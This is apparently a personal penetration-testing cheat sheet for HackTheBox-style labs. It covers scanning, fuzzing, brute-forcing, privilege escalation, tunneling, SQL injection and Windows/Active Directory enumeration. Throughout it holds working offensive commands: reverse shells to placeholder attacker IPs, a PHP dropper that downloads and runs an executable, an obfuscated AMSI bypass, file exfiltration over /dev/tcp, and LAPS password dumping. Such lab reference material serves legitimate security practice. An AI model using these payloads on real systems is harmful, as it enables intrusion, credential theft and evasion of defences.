Cheat Sheet
Some of the commands/tools I often use when doing machines on HTB and similar platforms
Table of Contents
Scan
Enumeration
Bruteforce
Linux Privilege Escalation
Utilities
Reverse Shells
Services
Tools
Wordlists
Miscellaneous
Tunneling
Web Exploitation
Windows Enumeration and Privilege Escalation
Scan
NMAP
Full TCP sweep with default scripts and version detection (--min-rate=5000 is fast but noisy), then a plain default scan:
```bash
sudo nmap -p- -sV -sC -oA nmap.out $IP --min-rate=5000
nmap -sV -sC $IP -oN basic_scan.nmap
```
Scan specific port(s) (e.g. port 22 and 80); -Pn skips host discovery for hosts that drop ping
```bash
nmap -sC -sV -p22,80 -Pn -oN nmap $IP
sudo nmap -p22,80 -sV -sC -A -oN scan/open-tcp-ports.txt -sT $ip
```
Rustscan
Everything after `--` is handed to nmap for the ports rustscan finds open:
```bash
sudo rustscan -u 6500 -b 3000 -a $IP -- -sC -sV -oN scan.txt
```
Enumeration
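Bridging the scan and enumeration steps: an added example, not part of the original cheat sheet, that parses the grepable output of the full-port sweep (`nmap -p- -oG sweep.gnmap`) into the `-p` list for the targeted `-sC -sV` scan and pulls out the http-looking ports to hand to the directory fuzzers. The sample scan output, the target 10.10.10.5 and the output file names are constructed.

```bash
#!/usr/bin/env bash
# Added example, not part of the original cheat sheet: parse grepable nmap output
# (-oG) from the full-port sweep and build the follow-up commands from it.
# The sample output and the IP 10.10.10.5 below are constructed.

# Open TCP ports from a -oG file as a comma-separated list (for nmap -p).
open_ports_from_gnmap() {
    grep '^Host:' "$1" \
        | grep -o '[0-9]*/open/tcp' \
        | cut -d/ -f1 \
        | sort -un \
        | paste -sd, -
}

# Open ports whose service name contains "http", one per line (for gobuster/ffuf).
# Each port entry is laid out as port/state/proto/owner/service/rpc/version.
http_ports_from_gnmap() {
    grep '^Host:' "$1" \
        | grep -o '[0-9]*/open/tcp//[^/]*' \
        | awk -F/ '$5 ~ /http/ { print $1 }' \
        | sort -un
}

# Constructed sample of what `nmap -p- -oG sweep.gnmap 10.10.10.5` writes.
sample_gnmap() {
    cat <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- -oG sweep.gnmap 10.10.10.5
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 3306/closed/tcp//mysql///, 8080/open/tcp//http-proxy///  Ignored State: filtered (65530)
# Nmap done -- 1 IP address (1 host up)
EOF
}

# Print the targeted scan and one directory-fuzzing command per web port.
follow_up_commands() {
    target=$1
    gnmap=$2
    ports=$(open_ports_from_gnmap "$gnmap")
    echo "nmap -sC -sV -p$ports -oN targeted.nmap $target"
    http_ports_from_gnmap "$gnmap" | while read -r p; do
        echo "gobuster dir -u http://$target:$p -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt"
    done
}

# Demo on the constructed sample.
tmp=$(mktemp)
sample_gnmap > "$tmp"
follow_up_commands 10.10.10.5 "$tmp"
rm -f "$tmp"
```

On a real box replace `sample_gnmap` with the `-oG` file of your sweep; closed and filtered ports are ignored because only entries in the `open` state are matched.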
Directory Fuzzing
Gobuster
```bash
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u <URL>
gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt -o output.txt
gobuster dir -e -t50 -q -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <URL>
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u <URL> -o gobuster.out
```
FFUF
```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u <URL>/FUZZ
```
Feroxbuster
```bash
feroxbuster -u <URL> --force-recursion -C 404 -m GET,POST
```
Fuzzing subdomains (virtual hosts, via the Host header)
```bash
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL>
ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.DOMAIN" -u <URL>
```
POST fuzzing, matching every status code and filtering out the default response size:
```bash
ffuf -u <URL>/FUZZ -X POST -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc all -fs 50
```
Filter by size (`-ac` auto-calibrates the filter from a few junk requests; `-fs` sets it by hand once you know the size of the default response)
```bash
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL> -fs {size}
```
Bruteforce
Login Bruteforce
Hydra bruteforce login
```bash
hydra -l $user -P /usr/share/wordlists/rockyou.txt -f $IP http-get /admin
hydra -t 1 -V -f -l $user -P /usr/share/wordlists/rockyou.txt $ip smb
hydra -l $user -P list.txt $ip ftp
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/admin/:user=admin&pass=^PASS^:Username or password invalid"
```
The http-post-form string is `path:POST body:failure string`; the failure string must appear only in failed responses, or every password "succeeds".
Bruteforce pop3 creds
```bash
hydra -L usernames_list.txt -P passwords_list.txt pop3://<ip>
```
Bruteforce wp-login using hydra and wpscan
```bash
hydra -L usernames_list.txt -P $password <ip> -V http-form-post '/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
hydra -l <username> -P <passwords.txt> <ip> -V http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30
wpscan -v -U $wordlist -P $wordlist --url <URL/wp-login.php>
```
Username bruteforce using FFUF (registration form that leaks existing users; match on the error message)
```bash
ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <URL> -mr "username already exists"
```
Bruteforce VNC using hydra
```bash
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<ip>
```
Bruteforce procs (walk /proc/<pid>/cmdline through an LFI to find what is running and with which arguments)
```bash
for i in $(seq 900 1000); do curl "$IP:<port>/?page=../../../../proc/$i/cmdline" -o -; echo "PID => $i"; done
```
Bruteforce OTP code
```bash
ffuf -c -u 'http://<ip>:<port>/otp-auth' -H 'Content-Type: application/json' -X POST -d '{"otp":"FUZZ"}' -fr '{"success": "false"}' -w digits.txt -od output
```
where digits.txt is a file with all 4-digit pins and output is an empty directory (-od saves every matching request and response there). -fr drops responses matching the failure regex, so whatever is left is the hit.
Linux Privilege Escalation
Crons
```bash
cat /etc/crontab
```
pspy64 (under Tools) shows cron jobs and other processes as they start, without root.
getcap (binaries with file capabilities such as cap_setuid)
```bash
getcap -r / 2>/dev/null
```
doas (check /etc/doas.conf for which users and commands are permitted)
```bash
doas -u root /bin/bash
```
Find running services (listening ports that are bound to localhost only are candidates for tunneling)
```bash
netstat -ant
netstat -tulpen
netstat -an -p tcp
ss -tlp
```
Python debugger
If a privileged script drops into `pdb` (`import pdb` with a breakpoint), anything typed at the (Pdb) prompt is executed as Python, so a shell is one import away.
PATH Hijacking
When a privileged process (a sudo rule, a cron job or a SUID binary) calls `systemctl` by bare name and inherits your PATH, drop a fake one in the current directory and put `.` first:
```bash
echo '/bin/bash' > systemctl
chmod +x systemctl
export PATH=.:$PATH
```
This only works if the caller really inherits PATH: sudo resets it to `secure_path` unless the rule keeps the environment, so check `sudo -l` and look at the binary's strings for unqualified command names.
Utilities
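The PATH hijacking trick above depends on one condition, that the privileged caller runs the command by bare name with an inherited PATH. The following is an added example, not from the original cheat sheet, that reproduces both the vulnerable and the hardened caller side by side; a fake `id` stands in for the fake `systemctl` so it runs on any box, and the working directory and marker file are created by the demo itself.

```bash
#!/usr/bin/env bash
# Added example, not part of the original cheat sheet: shows the condition the PATH
# trick depends on. A fake "id" stands in for the fake systemctl so the demo runs on
# any box; the working directory and marker file are constructed by the demo itself.

# Drop a fake binary called $2 into directory $1 that records that it was executed.
plant_fake_binary() {
    dir=$(cd "$1" && pwd)
    name=$2
    cat > "$dir/$name" <<EOF
#!/bin/sh
echo hijacked > "$dir/$name.marker"
EOF
    chmod +x "$dir/$name"
}

# Vulnerable caller: runs the command by bare name with whatever PATH it inherited
# (sudo with env_keep+=PATH, a cron or SUID wrapper that does not reset PATH).
run_unqualified() {
    sh -c "$1 >/dev/null 2>&1"
}

# Hardened caller: resets PATH to trusted directories first (what sudo's
# secure_path does), so "." is never searched.
run_with_safe_path() {
    PATH=/usr/bin:/bin sh -c "$1 >/dev/null 2>&1"
}

# Run the caller named by $3 (unqualified | with_safe_path) from inside $1 with
# "." at the front of PATH, as in the cheat-sheet commands. Prints "hijacked"
# if the planted binary ran, "safe" otherwise.
hijack_result() {
    dir=$(cd "$1" && pwd)
    name=$2
    mode=$3
    rm -f "$dir/$name.marker"
    ( cd "$dir" && export PATH=".:$PATH" && "run_$mode" "$name" )
    if [ -f "$dir/$name.marker" ]; then echo hijacked; else echo safe; fi
}

# Demo: the same planted binary hijacks one caller and not the other.
work=$(mktemp -d ./pathhijack.XXXXXX)
plant_fake_binary "$work" id
echo "unqualified caller: $(hijack_result "$work" id unqualified)"      # hijacked
echo "safe-PATH caller:   $(hijack_result "$work" id with_safe_path)"   # safe
rm -rf "$work"
```

The same check applies when auditing a target: if the privileged script or binary references `systemctl` (or any command) without an absolute path and does not reset PATH, the planted file runs; if it uses `/bin/systemctl` or sets PATH itself, it does not.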
Random Commands
MTU (lower it when the VPN tunnel drops large packets)
```bash
sudo ifconfig tun0 mtu 1200
```
Send a file from the victim machine to the attacker machine (needs bash on the victim for /dev/tcp)
On the attacker machine, start the listener first:
```bash
nc -nlvp <port> > filename
```
Then on the victim machine:
```bash
cat $file > /dev/tcp/<attacker ip>/<port>
```
Compare a checksum of the file on both ends afterwards; nc does not detect a truncated transfer.
Find Command
Listing files owned by a group
```bash
find / -type f -group users 2>/dev/null
```
Search for SUID files
```bash
find / -user root -perm -4000 -print 2>/dev/null
```
JohnTheRipper
Rules file
/etc/john/john.conf
Example rule (appends every two-digit combination 00-99 to each word; select it with --rules=$name)
```
[List.Rules:$name]
Az"[0-9][0-9]"
```
ASC / GPG Keys
```bash
gpg --import private.key
gpg --decrypt fragment.asc
```
Reverse Shells
mkfifo
```bash
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f
```
python
```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Pentestmonkey
https://github.com/pentestmonkey/php-reverse-shell
High On Coffee
https://highon.coffee/blog/reverse-shell-cheat-sheet/
PayloadsAllTheThings
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
XCT shell
Serve xc.exe from the attacker box (e.g. python3 -m http.server 8000), then have the target fetch and run it:
```php
<?php
$data = file_get_contents('http://10.10.14.20:8000/xc.exe');
file_put_contents('C:\\programdata\\xc_10.10.14.20_9001.exe', $data);
system("C:\\programdata\\xc_10.10.14.20_9001.exe");
?>
```
Listener on the attacker side:
```bash
./xc -l -p 9001
```
shellcat (my tool)
https://github.com/seriotonctf/shellcat
Obfuscated PowerShell (AMSI bypass: sets System.Management.Automation.AmsiUtils.amsiInitFailed to true so the reverse shell loaded afterwards is not scanned)
```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```
SharpEvader
https://github.com/Xyan1d3/SharpEvader
```bash
python3 sharpevader.py -p windows/x64/meterpreter/reverse_tcp -lh tun0 -lp 9001
```
msfvenom
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx -o exploit.aspx
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "\x00\x25\x26" -f python -v shellcode
```
Services
SMB
List shares
```bash
smbclient -L //<IP>
```
Connect to a share
```bash
smbclient //$IP/$share
smbclient -U $user \\\\$ip\\$share
```
Download a full folder from SMB
```
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```
Copy a file over an SMB server
Run on the attacker machine (impacket; shares the current directory as "share"):
```bash
smbserver.py share . -smb2support
```
Run on the target machine:
```
copy <filename> \\<IP>\share\
```
FTP
Connect to FTP via URL (useful when a parameter of the target fetches URLs for you)
```
ftp://$user:$password@$domain
```
$ip works in place of $domain, e.g.:
```
?u=ftp://$user:$password@$ip
```
Change the local directory from inside the ftp client
```
lcd ftp
```
SSH
Get a file from an SSH server
```bash
scp -P22 user@IP:filename .
```
Send a file via SSH
```bash
scp $filename $user@$IP:.
```
SCP a folder to your local machine
```bash
scp -r $user@$IP:/var/www/html .
```
Hydra username/password bruteforce
```bash
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://$IP
hydra -l <username> -P <wordlist> $IP -t 4 ssh
```
Tricks to connect to SSH
Generate a key pair, add the public key (mykey.pub) to the authorized_keys file inside the .ssh folder of the target user, then connect with ssh -i mykey:
```bash
ssh-keygen -f mykey
```
SSH Tunneling
Forward a port that listens only on the target's loopback to your own machine:
```bash
ssh <USER>@<IP> -L <LOCAL PORT>:127.0.0.1:<REMOTE PORT>
```
RDP
```bash
xfreerdp /u:$user /d:WORKGROUP /p:$pass /v:$ip
```
WordPress
```bash
wpscan --api-token '$your_token_here' --url $URL -U $user -P $password
wpscan --url $URL -e ap,u
```
-P takes a single password or a password list; -e ap,u enumerates all plugins and users.
MySQL
Non-interactive command (no space between -p and the password, otherwise mysql prompts for one and treats the next word as the database name)
```bash
mysql -u $user -p"$pass" -D $database -e '$command;'
```
SNMP
```bash
snmpwalk -v 2c -c public $IP
```
Common vuln
Get the telnet password of an HP JetDirect printer using SNMP (the OID is in HP's enterprise tree)
```bash
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0
```
Ref: http://www.irongeek.com/i.php?page=security/networkprinterhacking
Docker
```bash
docker pull [image name]
docker run [image name]
docker inspect [image name]
```
Run docker interactive
```bash
docker run -it [image]
```
Check image history (build steps often leak secrets; --no-trunc shows the full commands)
```bash
docker history [image]
docker history --no-trunc [image]
```
Save layers
```bash
docker save [image] -o layers.tar
```
Extract docker layers
https://github.com/micahyoung/docker-layer-extract
Git
Show the most recent commit with its diff
```bash
git show
```
Diff the working tree against the previous commit
```bash
git diff HEAD~1
```
NFS
Mount an export (list the exports first with showmount -e <IP>)
```bash
sudo mount -t nfs <IP>:<export path> ./tmp
```
Redis
```bash
redis-cli -h <IP> -a '$secret'
```
List keys
```
KEYS *
```
Retrieve a range of elements from a list stored at a specific key (indexes are zero-based, so this skips the first element; 0 -1 returns everything)
```
LRANGE authlist 1 100
```
MongoDB
Start the mongo shell
```bash
mongo
```
Show the databases
```
show dbs
```
Show the collections inside the database (select it first with use <db>; show tables is an alias of show collections)
```
show tables
```
Find the content of a collection
```
db.$table_name.find()
```
VNC
Bruteforce login using hydra and msfconsole
hydra
```bash
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<IP>
```
Using Metasploit
```
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts <rhost>
msf6 auxiliary(scanner/vnc/vnc_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/vnc/vnc_login) > run
```
Reference: https://www.hackingarticles.in/password-crackingvnc/
Interact with VNC
```bash
vncviewer <IP>
```
rsync
List files
```bash
rsync -av --list-only rsync://<IP>/<sharename>
```
Dump files
```bash
rsync -av rsync://<IP>/<sharename> <destination folder>
```
Write a file to a specific location (e.g. drop an authorized_keys into a user's .ssh on a writable module)
```bash
rsync <filename> rsync://sys-internal@<IP>/files/sys-internal/.ssh
```
Tools
Enumeration Tools
lse.sh: https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
linpeas.sh: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
winpeas.exe: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
pspy64: https://github.com/DominicBreuker/pspy/releases
searchsploit (-m mirrors the exploit file into the current directory)
```bash
searchsploit -m php/webapps/49876.py
```
gMSADumper
https://github.com/micahvandeusen/gMSADumper
sucrack
https://github.com/hemp3l/sucrack
Compiled Binaries
https://github.com/Flangvik/SharpCollection
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Wordlists
Seclists
seclists : https://github.com/danielmiessler/SecLists
rockyou.txt
Make a wordlist out of a website
```bash
cewl -w wordlists.cewl $website -d 3
```
Make a lower-case copy of the wordlist (write to a separate file rather than appending to the file being read)
```bash
tr '[:upper:]' '[:lower:]' < wordlists.cewl > wordlists.lower
```
Merge, sort and deduplicate
```bash
cat wordlists.cewl wordlists.lower | sort -u > sorted.lst
```
Miscellaneous
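Two small wordlist builders, added here as an example that is not part of the original cheat sheet: `gen_pins` writes the zero-padded `digits.txt` that the OTP fuzzing command in the Bruteforce section expects, and `mangle_wordlist` turns a cewl dump (as produced by the Wordlists commands above) into lower/Capitalised/UPPER variants with common suffixes, deduplicated. The `SUFFIXES` variable and the sample words are my own; the file names match the commands above.

```bash
#!/usr/bin/env bash
# Added example, not part of the original cheat sheet: two wordlist builders.
# gen_pins writes the zero-padded digits.txt that the OTP fuzzing command in the
# Bruteforce section expects; mangle_wordlist turns a cewl dump into
# lower/Capitalised/UPPER variants with common suffixes, deduplicated, instead of
# appending to the file being read. The sample words are constructed.

# All zero-padded PINs of length $1, one per line (4 -> 0000 .. 9999).
gen_pins() {
    n=$1
    max=$(printf '%*s' "$n" '' | tr ' ' 9)   # n nines, e.g. 9999
    seq -w 0 "$max"
}

# Read words on stdin, emit case variants with and without suffixes, deduplicated.
# Override the suffix set with SUFFIXES="1 123 2024" (assumed variable, mine).
mangle_wordlist() {
    suffixes=${SUFFIXES:-1 123 2023 2024}
    while read -r w; do
        [ -n "$w" ] || continue
        lower=$(printf '%s' "$w" | tr '[:upper:]' '[:lower:]')
        upper=$(printf '%s' "$w" | tr '[:lower:]' '[:upper:]')
        cap=$(printf '%s' "$lower" | cut -c1 | tr '[:lower:]' '[:upper:]')$(printf '%s' "$lower" | cut -c2-)
        for base in "$lower" "$cap" "$upper"; do
            printf '%s\n' "$base"
            for s in $suffixes; do
                printf '%s%s\n' "$base" "$s"
            done
        done
    done | sort -u
}

# Usage (constructed input; on a real box feed it cewl's output):
#   gen_pins 4 > digits.txt
#   mangle_wordlist < wordlists.cewl > mangled.lst
#   printf 'Admin\nwebapp\n' | mangle_wordlist
```

Each input word yields 3 case variants times (1 + number of suffixes) candidates, so keep the suffix list short for large cewl dumps; the `sort -u` at the end also removes the duplicates that appear when a word is already lower case.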
TTY Shell Upgrade
Spawn a tty shell
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
python2 -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -c bash
```
Then make it fully interactive (tab completion, Ctrl+C without losing the shell):
```bash
export TERM=xterm
# press Ctrl+Z to background the shell, then on your own terminal:
stty raw -echo; fg
# back in the reverse shell (take the values from `stty size` on your terminal):
stty rows <rows> columns <cols>
```
Tunneling
Chisel
https://github.com/jpillora/chisel
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
Used here : https://0xdf.gitlab.io/2022/05/03/htb-antique.html
Serve the binary from your machine, then fetch it on the target:
```bash
python3 -m http.server
```
```bash
cd /tmp
wget $ip/chisel_1.7.7_linux_amd64
chmod +x chisel_1.7.7_linux_amd64
```
I'll run the binary in server mode on my box:
```bash
./chisel_1.7.7_linux_amd64 server -p <port> --reverse
```
Now I'll connect with chisel from the container:
```bash
./chisel_1.7.7_linux_amd64 client $my_ip:<port> R:<port to forward>:<target ip>:<port to forward>
```
Example: forwarding port 5985 from the docker container
My machine:
```bash
./chisel server -p 5000 --reverse
```
Target machine:
```bash
./chisel client <tun0 ip>:5000 R:5985:<target ip>:5985
```
With --reverse the R: forward makes your machine listen on 127.0.0.1:5985 and relays it through the client to <target ip>:5985.
Forward 2 ports at the same time (Windows client; <ip>:<port> is the chisel server)
```
.\chisel.exe client <ip>:<chisel server port> R:<first port to forward>:localhost:<first port to forward> R:<second port to forward>:localhost:<second port to forward>
```
Socat
Relay connections to local port 8001 on to port 8000:
```bash
./socat tcp-listen:8001,reuseaddr,fork tcp:localhost:8000
```
Proxy
Send curl, wget and other http_proxy-aware tools through Burp:
```bash
export http_proxy=127.0.0.1:8080
```
Web Exploitation
SQLi
Union Payloads (MySQL; the number of selected columns, 2 here, must match the original query)
```sql
' UNION SELECT 1,table_name from information_schema.tables where table_schema='webapp'-- -
' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_schema='webapp' and table_name='queue' -- -
```
Write to a file (needs the FILE privilege and a secure_file_priv setting that allows the target directory)
```sql
' UNION SELECT 1,'serioton' INTO OUTFILE '/var/www/html/test.html' -- -
```
Read a file (same privilege; load_file returns NULL rather than an error when it is not allowed)
```sql
' UNION SELECT 1,load_file('/etc/passwd') -- -
```
Windows Enumeration and Privilege Escalation
The script below looks for Win32 services on the host with unquoted service paths outside the Windows folder.
```powershell
Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch '"' -and $_.PathName -inotmatch ':\\Windows\\' } | Select Name,PathName
```
An unquoted path with spaces is only useful if you can write to one of the directories along it and the service runs as a privileged account and can be restarted.
Check for user privileges
```
whoami /priv
```
PowerShell history file
```
%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_History.txt
```
Check for specific user info
```
net user $username
```
Get the LAPS passwords (legacy LAPS stores them in the ms-Mcs-AdmPwd attribute, readable only by principals granted that right; dumping all properties works but is noisy)
```powershell
Get-ADComputer -Filter * -Properties *
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | Select-Object Name,ms-Mcs-AdmPwd
```
Check if we can connect via winrm
```bash
crackmapexec winrm <ip> -u <username> -p <password>
```
Login via evil-winrm
```bash
evil-winrm -i <ip> -u <username> -p <password>
```
BloodHound
bloodhound-python (collect from Linux)
```bash
bloodhound-python -c all -u <username> -p <password> -d <domain> -dc <dc> -ns <ip> --disable-pooling -w1 --dns-timeout 30
```
First start neo4j
```bash
sudo neo4j console
```
Then start BloodHound and import the collected zip
```bash
bloodhound
```